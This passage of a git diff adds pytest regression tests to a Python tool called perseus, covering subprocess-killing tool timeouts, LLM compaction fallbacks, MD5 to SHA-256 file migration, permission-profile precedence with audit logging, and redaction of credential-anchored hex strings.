+ assert isinstance(out, str) diff --git a/tests/test_mcp.py b/tests/test_mcp.py index 95e0df6..d60e972 100644 --- a/tests/test_mcp.py +++ b/tests/test_mcp.py @@ -145,3 +145,124 @@ def test_stdio_handshake(): finally: proc.stdin.close() proc.wait(timeout=5) + + +# ───────────────────────────────────────────────────────────────────────────── +# #139 regression: _call_tool timeout must kill the subprocess tree and +# must not block on executor shutdown +# ───────────────────────────────────────────────────────────────────────────── + + +def _mcp_query_cfg() -> dict: + """Build a config that allows perseus_query via MCP.""" + c = cfg() + c.setdefault("render", {})["allow_query_shell"] = True + c.setdefault("mcp", {})["tool_timeout_s"] = 1 + c["mcp"]["tool_allowlist"] = ["perseus_query"] + return c + + +def test_call_tool_timeout_does_not_block_on_executor_shutdown(tmp_path): + """Regression for #139 - pre-1.0.6 used a context-managed executor, + so future.result(timeout=…) abandoned the future but executor.shutdown + (wait=True) blocked the response until the worker finished. A 1s timeout + on a 10s sleep blocked _call_tool for ~10s. + + Post-fix: shutdown(wait=False, cancel_futures=True) is called in a + finally block. The response returns within ~timeout seconds, not + ~sleep seconds. + """ + c = _mcp_query_cfg() + + start = time.time() + result = perseus._call_tool( + "perseus_query", + {"command": f"sleep 10"}, + c, + tmp_path, + ) + elapsed = time.time() - start + + # Must return promptly. We allow generous headroom (3s) for thread + # scheduling + subprocess cleanup, but the bug being tested manifested + # as ~10s blocking. + assert elapsed < 3.0, ( + f"_call_tool blocked for {elapsed:.2f}s - executor.shutdown(wait=True) " + f"defeated the timeout" + ) + assert "timed out" in result.lower() + + +def test_call_tool_timeout_actually_kills_subprocess(tmp_path): + """Regression for #139 - pre-1.0.6 abandoned the worker but the + subprocess kept running.
After fix, the subprocess tree is killed + via os.killpg (POSIX) or taskkill /T (Windows) on timeout. + """ + import os, subprocess, time as _time, uuid, shutil + if os.name == "nt": + pytest.skip("Subprocess-tree kill test is POSIX-specific") + if shutil.which("pgrep") is None: + pytest.skip("pgrep not available") + + c = _mcp_query_cfg() + + # Use a unique marker so pgrep can find OUR sleep process without + # matching unrelated ones. + marker = f"perseus_test_marker_{uuid.uuid4().hex[:8]}" + cmd = f"sleep 30 # {marker}" + + start = _time.time() + result = perseus._call_tool( + "perseus_query", + {"command": cmd}, + c, + tmp_path, + ) + elapsed = _time.time() - start + + assert elapsed < 3.0 + assert "timed out" in result.lower() + + # Wait briefly for the kill signal to propagate, then assert no + # zombie sleep process remains. + _time.sleep(0.5) + pgrep = subprocess.run( + ["pgrep", "-f", marker], + capture_output=True, text=True, + ) + # pgrep exit code 1 means no matches (good); 0 means matches (bad). + if pgrep.returncode == 0: + # Cleanup before failing + for pid in pgrep.stdout.split(): + try: + os.kill(int(pid), 9) + except (ValueError, ProcessLookupError): + pass + pytest.fail( + f"Subprocess(es) still running after timeout: {pgrep.stdout.strip()}" + ) + + # And the killer hint should be in the result. 
+ assert "subprocess killed" in result.lower() or "timed out" in result.lower() + + +def test_call_tool_normal_completion_under_timeout(tmp_path): + """Sanity: under-timeout calls still work normally.""" + c = _mcp_query_cfg() + c["mcp"]["tool_timeout_s"] = 5 + result = perseus._call_tool( + "perseus_query", + {"command": "echo hello-mcp"}, + c, + tmp_path, + ) + assert "hello-mcp" in result + assert "timed out" not in result.lower() + + +def test_kill_active_subprocess_for_thread_returns_false_when_no_subprocess(): + """The killer is safe to call when no subprocess is registered.""" + import threading + fake_tid = threading.get_ident() + 12345 # ident no thread will use + result = perseus.kill_active_subprocess_for_thread(fake_tid) + assert result is False diff --git a/tests/test_memory.py b/tests/test_memory.py index 0947af1..515da57 100644 --- a/tests/test_memory.py +++ b/tests/test_memory.py @@ -360,3 +360,109 @@ def test_memory_status_json_with_narrative(tmp_path, monkeypatch): "pythia_entries_processed", "pythia_entries_pending", "compaction_count", "line_count", "mode", "frontmatter"): assert key in out, f"Missing key: {key}" + + +# ───────────────────────────────────────────────────────────────────────────── +# #131 regression: memory compact must enforce a wall-clock deadline +# ───────────────────────────────────────────────────────────────────────────── + + +def test_memory_compact_total_timeout_falls_back_to_deterministic( + tmp_path, monkeypatch, capsys +): + """Regression for #131 - when the LLM compact path exceeds + `memory.compact_total_timeout_s`, _memory_do_compact must abandon the + LLM call and use the deterministic narrative builder instead. The + operator gets a clear stderr message AND a usable narrative.
+ """ + local = _mneme_cfg(tmp_path) + local["memory"]["compact_total_timeout_s"] = 0.5 # short for test + + _write_checkpoint(Path(local["checkpoints"]["store"]), + "2026-05-15T10:00:00+00:00", "A") + _write_checkpoint(Path(local["checkpoints"]["store"]), + "2026-05-16T10:00:00+00:00", "B") + + def slow_llm(*args, **kwargs): + # Simulate a slow LLM (e.g. Ollama with a large model). + time.sleep(2.0) + return "## LLM Content\n\nIf you see this, the timeout did not fire.\n" + + monkeypatch.setattr(perseus, "_mneme_compact_llm", slow_llm) + + start = time.time() + msg = perseus._memory_do_compact(tmp_path, local, provider="ollama") + elapsed = time.time() - start + + # Should return well under 2.0s - only block for the timeout deadline, + # not for the full LLM call (we cannot interrupt the thread, but + # future.result(timeout=…) returns immediately on TimeoutError). + assert elapsed < 1.5, ( + f"Compact took {elapsed:.2f}s - wall-clock deadline did not fire" + ) + + # Narrative should be the deterministic fallback, not the LLM payload.
+ p = perseus._mneme_path(tmp_path, local) + _, body = perseus._load_narrative(p) + assert "If you see this" not in body, ( + "LLM content present - fallback did not engage" + ) + assert "## Project Arc" in body, "Deterministic narrative missing" + + err = capsys.readouterr().err + assert "exceeded" in err.lower() or "timeout" in err.lower() + assert "deterministic" in err.lower() + + +def test_memory_compact_succeeds_within_total_timeout(tmp_path, monkeypatch): + """LLM compact succeeds when under the deadline.""" + local = _mneme_cfg(tmp_path) + local["memory"]["compact_total_timeout_s"] = 5.0 + + _write_checkpoint(Path(local["checkpoints"]["store"]), + "2026-05-15T10:00:00+00:00", "A") + + def fast_llm(*args, **kwargs): + time.sleep(0.05) + return "## Project Arc\n\nLLM-built narrative content.\n" + + monkeypatch.setattr(perseus, "_mneme_compact_llm", fast_llm) + + perseus._memory_do_compact(tmp_path, local, provider="ollama") + + p = perseus._mneme_path(tmp_path, local) + _, body = perseus._load_narrative(p) + assert "LLM-built narrative content." in body, ( + "LLM body should have been used when call returned within deadline" + ) + + +def test_memory_compact_llm_exception_falls_back_to_deterministic( + tmp_path, monkeypatch, capsys +): + """If the LLM call raises (e.g. provider unreachable), fall back to + deterministic narrative rather than propagating the exception up. + """ + local = _mneme_cfg(tmp_path) + _write_checkpoint(Path(local["checkpoints"]["store"]), + "2026-05-15T10:00:00+00:00", "A") + + def broken_llm(*args, **kwargs): + raise RuntimeError("> ⚠ LLM request failed: Connection refused") + + monkeypatch.setattr(perseus, "_mneme_compact_llm", broken_llm) + + # Must NOT raise - fallback engages.
+ msg = perseus._memory_do_compact(tmp_path, local, provider="ollama") + + p = perseus._mneme_path(tmp_path, local) + _, body = perseus._load_narrative(p) + assert "## Project Arc" in body + err = capsys.readouterr().err + assert "Connection refused" in err or "failed" in err + assert "deterministic" in err + + +def test_memory_compact_default_timeout_is_180s(): + """The DEFAULT_CONFIG must set compact_total_timeout_s to 180s.""" + assert perseus.DEFAULT_CONFIG["memory"]["compact_total_timeout_s"] == 180 diff --git a/tests/test_mneme.py b/tests/test_mneme.py index 39e86dc..a8c0879 100644 --- a/tests/test_mneme.py +++ b/tests/test_mneme.py @@ -187,3 +187,176 @@ def fake_mneme(cfg_, query, k=5, scope=None, type_filter=None, sensitivity=None) perseus.resolve_memory('mode=search query="x"', cfg(), workspace=tmp_path) assert called + + +# --------------------------------------------------------------------------- +# #128 regression: MD5 → SHA-256 narrative migration +# --------------------------------------------------------------------------- + + +def _legacy_md5_name(workspace: Path) -> str: + """Reproduce the pre-1.0.3 hash exactly for fixture setup.""" + import hashlib as _h + canonical = str(workspace.expanduser().resolve()).encode() + try: + return _h.md5(canonical, usedforsecurity=False).hexdigest()[:12] + except TypeError: + return _h.md5(canonical).hexdigest()[:12] + + +def test_mneme_path_auto_migrates_legacy_md5_file(tmp_path): + """Regression for #128 - opening a workspace with only a legacy MD5 + narrative on disk renames it transparently to the SHA-256 path. + + Without this fix, every pre-1.0.3 user lost their narrative silently + on the v1.0.3 upgrade (the SHA-256 path didn't exist; Mnēmē reported + "No narrative yet" and started over, leaving the MD5 file orphaned).
+ """ + store = tmp_path / "store" + store.mkdir() + workspace = tmp_path / "ws" + workspace.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + legacy_name = _legacy_md5_name(workspace) + legacy_fp = store / f"{legacy_name}.md" + legacy_fp.write_text( + f"---\nworkspace: {workspace}\nchecksum: legacy-md5\n---\n\n" + "## Project Arc\n\nLegacy content from v1.0.2.\n", + encoding="utf-8", + ) + + # First call should migrate. + new_fp = perseus._mneme_path(workspace, cfg_) + assert new_fp.exists(), "SHA-256 path must exist after migration" + assert not legacy_fp.exists(), "Legacy MD5 file must be renamed away" + body = new_fp.read_text(encoding="utf-8") + assert "Legacy content from v1.0.2." in body, ( + "Migration must preserve narrative content verbatim" + ) + + +def test_mneme_path_no_migration_when_sha256_already_exists(tmp_path): + """If both files exist, prefer SHA-256 and leave the legacy file alone. + + This protects against double-migration races and ensures we never + accidentally overwrite a current-scheme narrative. 
+ """ + store = tmp_path / "store" + store.mkdir() + workspace = tmp_path / "ws" + workspace.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + legacy_name = _legacy_md5_name(workspace) + legacy_fp = store / f"{legacy_name}.md" + legacy_fp.write_text("legacy\n", encoding="utf-8") + + sha_name = perseus._workspace_hash(workspace) + sha_fp = store / f"{sha_name}.md" + sha_fp.write_text("current\n", encoding="utf-8") + + result = perseus._mneme_path(workspace, cfg_) + assert result == sha_fp + assert sha_fp.read_text() == "current\n", "Current file must be untouched" + assert legacy_fp.exists(), "Legacy file must NOT be removed in this case" + + +def test_mneme_path_is_idempotent_after_migration(tmp_path): + """Calling _mneme_path twice in a row after a migration is a no-op.""" + store = tmp_path / "store" + store.mkdir() + workspace = tmp_path / "ws" + workspace.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + legacy_fp = store / f"{_legacy_md5_name(workspace)}.md" + legacy_fp.write_text(f"---\nworkspace: {workspace}\n---\n\ndata\n", encoding="utf-8") + + p1 = perseus._mneme_path(workspace, cfg_) + p2 = perseus._mneme_path(workspace, cfg_) + assert p1 == p2 + assert p1.exists() + assert p1.read_text(encoding="utf-8").endswith("data\n") + + +def test_memory_doctor_scan_classifies_files(tmp_path): + """`memory doctor` (scan-only mode) correctly classifies the store.""" + store = tmp_path / "store" + store.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + ws1 = tmp_path / "ws1"; ws1.mkdir() + ws2 = tmp_path / "ws2"; ws2.mkdir() + + # ws1 has a SHA-256 narrative; ws2 has a legacy MD5 narrative. + (store / f"{perseus._workspace_hash(ws1)}.md").write_text( + f"---\nworkspace: {ws1}\n---\n\nsha file\n", encoding="utf-8" + ) + (store / f"{_legacy_md5_name(ws2)}.md").write_text( + f"---\nworkspace: {ws2}\n---\n\nmd5 file\n", encoding="utf-8" + ) + # A pre-Mnēmē README that should be classified as "unknown stem".
+ (store / "README.md").write_text("# notes\n", encoding="utf-8") + + scan = perseus._mneme_doctor_scan(cfg_) + assert len(scan["narrative_files"]) == 3 + assert len(scan["sha256_files"]) == 1 + assert len(scan["legacy_md5_files"]) == 1 + assert len(scan["unknown_files"]) == 1 + assert scan["sha256_files"][0].endswith(f"{perseus._workspace_hash(ws1)}.md") + assert scan["legacy_md5_files"][0].endswith(f"{_legacy_md5_name(ws2)}.md") + + +def test_memory_doctor_migrate_renames_legacy_files(tmp_path): + """`memory doctor --migrate` renames every legacy MD5 file in the store.""" + store = tmp_path / "store" + store.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + wsA = tmp_path / "wsA"; wsA.mkdir() + wsB = tmp_path / "wsB"; wsB.mkdir() + legacyA = store / f"{_legacy_md5_name(wsA)}.md" + legacyB = store / f"{_legacy_md5_name(wsB)}.md" + legacyA.write_text(f"---\nworkspace: {wsA}\n---\n\nA content\n", encoding="utf-8") + legacyB.write_text(f"---\nworkspace: {wsB}\n---\n\nB content\n", encoding="utf-8") + + result = perseus._mneme_doctor_migrate(cfg_) + assert len(result["migrated"]) == 2 + assert not legacyA.exists() + assert not legacyB.exists() + + new_A = store / f"{perseus._workspace_hash(wsA)}.md" + new_B = store / f"{perseus._workspace_hash(wsB)}.md" + assert new_A.exists() and new_A.read_text().endswith("A content\n") + assert new_B.exists() and new_B.read_text().endswith("B content\n") + + # Idempotent: re-running is a no-op. 
+ second = perseus._mneme_doctor_migrate(cfg_) + assert second == {"migrated": [], "skipped": [], "errors": []} + + +def test_memory_doctor_migrate_skips_when_destination_exists(tmp_path): + """If a SHA-256 file is already there, --migrate skips the legacy file.""" + store = tmp_path / "store" + store.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + workspace = tmp_path / "ws" + workspace.mkdir() + legacy_fp = store / f"{_legacy_md5_name(workspace)}.md" + legacy_fp.write_text(f"---\nworkspace: {workspace}\n---\n\nlegacy\n", + encoding="utf-8") + sha_fp = store / f"{perseus._workspace_hash(workspace)}.md" + sha_fp.write_text(f"---\nworkspace: {workspace}\n---\n\ncurrent\n", + encoding="utf-8") + + result = perseus._mneme_doctor_migrate(cfg_) + assert result["migrated"] == [] + assert len(result["skipped"]) == 1 + old, new, reason = result["skipped"][0] + assert "exists" in reason + # Both files still present. + assert legacy_fp.exists() + assert sha_fp.exists() + assert sha_fp.read_text().endswith("current\n") diff --git a/tests/test_permission_profiles.py b/tests/test_permission_profiles.py index 1481e63..c524beb 100644 --- a/tests/test_permission_profiles.py +++ b/tests/test_permission_profiles.py @@ -259,3 +259,216 @@ def test_trust_summary_partial_config_fails_closed(): assert payload["effective"]["render"]["allow_query_shell"] is False assert payload["effective"]["render"]["allow_agent_shell"] is False + + +# ── #129 hardening regression matrix ───────────────────────────────────────── +# Pre-1.0.6 there was a documented bug where a workspace config that set both +# `permissions.profile: balanced` and `render.allow_query_shell: true` would +# silently render with `allow_query_shell=false` because the profile merge +# overwrote the user's explicit value. The fix landed via load_config call- +# ordering; v1.0.6 makes the precedence **structural** via `skip_keys`.
+# +# This matrix asserts the explicit-user-wins guarantee across: +# - all 3 named profiles (strict, balanced, power-user) +# - all 5 boolean security gates in render.* +# - both directions of override (user=True over profile=False +# and user=False over profile=True) +# +# It also asserts that the audit log records the layering decision. + +PROFILE_KEYS = [ + "allow_query_shell", + "allow_agent_shell", + "allow_services_command", + "allow_remote_services_health", + "allow_outside_workspace", +] + + +@pytest.mark.parametrize("profile_name", ["strict", "balanced", "power-user"]) +@pytest.mark.parametrize("override_key", PROFILE_KEYS) +@pytest.mark.parametrize("override_value", [True, False]) +def test_explicit_user_render_key_wins_over_profile( + monkeypatch, tmp_path, profile_name, override_key, override_value +): + """User-set render.* keys always win over the profile's default for + that key, regardless of profile or direction of override. + + This is the structural #129 guarantee.""" + home = tmp_path / "home" + home.mkdir() + workspace = tmp_path / "ws" + (workspace / ".perseus").mkdir(parents=True) + monkeypatch.setattr(perseus, "PERSEUS_HOME", home) + + (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({ + "permissions": {"profile": profile_name}, + "render": {override_key: override_value}, + })) + + cfg = perseus.load_config(workspace=workspace) + assert cfg["render"][override_key] is override_value, ( + f"profile={profile_name} key={override_key}: expected user value " + f"{override_value} but got {cfg['render'][override_key]}" + ) + + # Other render keys should still reflect the profile's value. 
+    expected_profile = perseus.PERMISSION_PROFILES[profile_name]["render"]
+    for key in PROFILE_KEYS:
+        if key == override_key:
+            continue
+        assert cfg["render"][key] == expected_profile[key], (
+            f"profile={profile_name}: non-overridden key {key} expected "
+            f"{expected_profile[key]} but got {cfg['render'][key]}"
+        )
+
+
+def test_explicit_user_value_wins_when_set_to_same_value_as_profile(
+    monkeypatch, tmp_path
+):
+    """If user explicitly sets a value identical to the profile default,
+    the result is still the user's value (semantically equivalent but the
+    audit log should record the override)."""
+    home = tmp_path / "home"
+    home.mkdir()
+    workspace = tmp_path / "ws"
+    (workspace / ".perseus").mkdir(parents=True)
+    monkeypatch.setattr(perseus, "PERSEUS_HOME", home)
+
+    (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({
+        "permissions": {"profile": "balanced"},
+        # Same value as balanced's default for this key
+        "render": {"allow_query_shell": False},
+    }))
+
+    cfg = perseus.load_config(workspace=workspace)
+    assert cfg["render"]["allow_query_shell"] is False
+
+
+def test_workspace_overrides_global_for_profile_and_render(
+    monkeypatch, tmp_path
+):
+    """Workspace `permissions.profile` AND workspace `render.*` both win
+    over global config. This is the most realistic Thomas-scenario:
+    global says strict, workspace says balanced with an override."""
+    home = tmp_path / "home"
+    home.mkdir()
+    workspace = tmp_path / "ws"
+    (workspace / ".perseus").mkdir(parents=True)
+    monkeypatch.setattr(perseus, "PERSEUS_HOME", home)
+
+    # Global: strict, everything off
+    (home / "config.yaml").write_text(yaml.safe_dump({
+        "permissions": {"profile": "strict"},
+    }))
+    # Workspace: balanced profile + power-user-ish override
+    (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({
+        "permissions": {"profile": "balanced"},
+        "render": {"allow_query_shell": True},
+    }))
+
+    cfg = perseus.load_config(workspace=workspace)
+    assert cfg["render"]["allow_query_shell"] is True
+    # Other keys should reflect balanced (workspace profile wins over global)
+    assert cfg["render"]["allow_agent_shell"] is False
+    assert cfg["render"]["allow_outside_workspace"] is False
+
+
+def test_apply_permission_profile_skip_keys_directly(monkeypatch):
+    """Unit test for the new `skip_keys` parameter."""
+    cfg = {
+        "render": {
+            "allow_query_shell": True,
+            "allow_agent_shell": False,
+        },
+    }
+    skip = {("render", "allow_query_shell")}
+    applied = perseus._apply_permission_profile(cfg, "strict", skip_keys=skip)
+    assert applied == "strict"
+    # Skipped key preserved
+    assert cfg["render"]["allow_query_shell"] is True
+    # Non-skipped key overwritten by profile
+    assert cfg["render"]["allow_agent_shell"] is False  # strict default
+    # Profile sets keys not in cfg
+    assert cfg["render"]["allow_services_command"] is False
+
+
+def test_apply_permission_profile_legacy_no_skip_keys_still_works(monkeypatch):
+    """Backward compatibility: callers passing no skip_keys get destructive
+    merge (pre-v1.0.6 behavior)."""
+    cfg = {
+        "render": {
+            "allow_query_shell": True,
+        },
+    }
+    applied = perseus._apply_permission_profile(cfg, "strict")
+    assert applied == "strict"
+    # No skip_keys → profile wins
+    assert cfg["render"]["allow_query_shell"] is False
+
+
+def test_audit_log_records_profile_override_decision(monkeypatch, tmp_path):
+    """When user explicitly overrides a profile-managed key, audit log
+    gets a `config_profile_overridden` event."""
+    # _audit_log_path constrains the log to ~/.perseus/ for safety (S5).
+    # Point HOME (not just PERSEUS_HOME) at tmp_path so the default audit
+    # path lands inside an allowed root.
+    home = tmp_path / "home"
+    (home / ".perseus").mkdir(parents=True)
+    monkeypatch.setattr(perseus, "PERSEUS_HOME", home / ".perseus")
+    monkeypatch.setenv("HOME", str(home))
+
+    workspace = tmp_path / "ws"
+    (workspace / ".perseus").mkdir(parents=True)
+
+    (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({
+        "permissions": {"profile": "balanced"},
+        "render": {"allow_query_shell": True},
+        "audit": {"enabled": True},
+    }))
+
+    cfg = perseus.load_config(workspace=workspace)
+    assert cfg["render"]["allow_query_shell"] is True
+
+    # Audit log should have a config_profile_overridden entry
+    audit_path = home / ".perseus" / "audit_log.jsonl"
+    assert audit_path.exists(), "Audit log was not created"
+    lines = [json.loads(line) for line in audit_path.read_text().splitlines() if line.strip()]
+    override_events = [e for e in lines if e.get("event_type") == "config_profile_overridden"]
+    assert len(override_events) >= 1, (
+        f"No config_profile_overridden event in audit log. Events: "
+        f"{[e.get('event_type') for e in lines]}"
+    )
+    evt = override_events[-1]
+    assert evt["profile"] == "balanced"
+    assert "render.allow_query_shell" in evt["user_overrides"]
+
+
+def test_no_audit_event_when_user_does_not_override_profile_keys(
+    monkeypatch, tmp_path
+):
+    """If user sets only keys NOT managed by the profile, no override
+    event is logged (it would be noise)."""
+    home = tmp_path / "home"
+    (home / ".perseus").mkdir(parents=True)
+    monkeypatch.setattr(perseus, "PERSEUS_HOME", home / ".perseus")
+    monkeypatch.setenv("HOME", str(home))
+
+    workspace = tmp_path / "ws"
+    (workspace / ".perseus").mkdir(parents=True)
+
+    (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({
+        "permissions": {"profile": "balanced"},
+        # `cache_dir` is not a profile-managed key
+        "render": {"cache_dir": str(home / "cache")},
+        "audit": {"enabled": True},
+    }))
+
+    cfg = perseus.load_config(workspace=workspace)
+    audit_path = home / ".perseus" / "audit_log.jsonl"
+    if audit_path.exists():
+        lines = [json.loads(line) for line in audit_path.read_text().splitlines() if line.strip()]
+        override_events = [e for e in lines if e.get("event_type") == "config_profile_overridden"]
+        assert len(override_events) == 0, (
+            "Should not log an override event for non-profile-managed keys"
+        )
diff --git a/tests/test_redaction.py b/tests/test_redaction.py
index 80bfa51..ba305b5 100644
--- a/tests/test_redaction.py
+++ b/tests/test_redaction.py
@@ -315,3 +315,70 @@ def test_strict_profile_does_not_disable_redaction(monkeypatch, tmp_path):
     }))
     cfg = perseus.load_config()
     assert cfg["redaction"]["enabled"] is True
+
+
+# ── regression: #136 long_hex_secret must NOT eat git hashes ─────────────────
+
+
+def test_bare_git_sha1_is_not_redacted_by_defaults():
+    """Regression for #136: bare 40-char git SHAs must survive default rules."""
+    git_log_line = "86ca950b3f1a2c4d5e6f7a8b9c0d1e2f3a4b5c6d fix(resolve_read)"
+    out, report = perseus.redact_text(git_log_line, {})
+    assert "86ca950b3f1a2c4d5e6f7a8b9c0d1e2f3a4b5c6d" in out
+    assert report["counts"].get("long_hex_secret", 0) == 0
+
+
+def test_bare_sha256_checksum_is_not_redacted_by_defaults():
+    """Regression for #136: 64-char SHA-256 sums must survive."""
+    sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
+    text = f"checksum: {sha256} perseus.py"
+    out, report = perseus.redact_text(text, {})
+    assert sha256 in out
+    assert report["counts"].get("long_hex_secret", 0) == 0
+
+
+def test_credential_anchored_hex_IS_redacted():
+    """Regression for #136: the new rule MUST still catch real secrets."""
+    cases = [
+        'api_key = "abcdef0123456789abcdef0123456789abcdef01"',
+        "secret=abcdef0123456789abcdef0123456789abcdef01",
+        'token: "abcdef0123456789abcdef0123456789abcdef01"',
+        "password = abcdef0123456789abcdef0123456789abcdef01",
+        "Authorization=abcdef0123456789abcdef0123456789abcdef01",
+    ]
+    for text in cases:
+        out, report = perseus.redact_text(text, {})
+        assert "abcdef01" not in out, (
+            f"Hex secret in credential context not redacted: {text!r} → {out!r}"
+        )
+        assert report["counts"].get("long_hex_secret", 0) >= 1
+
+
+def test_credential_anchored_hex_preserves_surrounding_context():
+    """The anchor context (key name, =, quotes) must survive verbatim."""
+    text = 'api_key = "abcdef0123456789abcdef0123456789abcdef01"'
+    out, _ = perseus.redact_text(text, {})
+    assert out.startswith('api_key = "[REDACTED:long_hex_secret]')
+    assert out.endswith('"')
+
+
+def test_bearer_header_prefix_still_preserved():
+    """Sanity: bearer_header prefix-preserve behavior must still work."""
+    text = "Authorization: Bearer abcdef0123456789abcdef0123456789"
+    out, _ = perseus.redact_text(text, {})
+    assert out.lower().startswith("authorization: bearer ")
+    assert "abcdef0123456789abcdef0123456789" not in out
+
+
+def test_at_query_git_log_output_survives_redaction():
+    """Integration regression: simulated @query 'git log' output preserved."""
+    git_log = "\n".join([
+        "86ca950 fix(resolve_read): add missing max_bytes assignment",
+        "ff5be4f fix(resolve_include): add missing max_bytes assignment",
+        "abcdef0123456789abcdef0123456789abcdef01 some commit",
+    ])
+    out, report = perseus.redact_text(git_log, {})
+    for hash_str in ("86ca950", "ff5be4f",
+                     "abcdef0123456789abcdef0123456789abcdef01"):
+        assert hash_str in out
+    assert report["counts"].get("long_hex_secret", 0) == 0